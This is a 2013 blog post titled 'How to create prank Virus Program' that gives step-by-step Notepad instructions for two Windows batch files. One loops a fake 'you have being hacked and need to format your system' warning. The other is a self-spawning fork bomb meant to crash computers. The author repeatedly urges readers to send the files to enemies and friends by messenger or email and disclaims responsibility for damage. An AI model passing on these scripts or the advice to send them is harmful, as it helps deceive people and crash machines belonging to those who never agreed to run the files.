Search This Blog

Monday, 7 October 2013

How to create prank Virus Program

hi friends
   Virus programs are dangerous computer programs that can destroy your system.  Today I tell you to create a prank virus program.You can also develop virus program and send to your enemies via messanger or email or anything else.
1- How to create virus Step by step Process

  • 1st Open notepad in your system
  • Type program in your notepad as it is.
@echo off
:hack
echo you have being hacked and need to format your system
goto hack

  •  Now save this program as name.bat like virus.bat
Your simple virus program is completed
Note: This is a virus program so make sure you don’t open it.Send this program to your enemies and friends via messenger, E-mail or anything else.
Never try it out my self LOL
If you open this program only you responsible for this. I am not responsible for any damage.

2- Virus program to crash Computers

  • Open notepad like in 1st program.
  • Type program as it is.
start virus.bat
virus.bat

And now save this program as name.bat like CrashVirus.bat
Note: This is a virus program so make sure you don’t open it. Send this program to your enemies and friends via messenger, E-mail or anything else.
Never try it out my self LOL
If you open this program only you responsible for this. I am not responsible for any damage.


No comments:

Post a Comment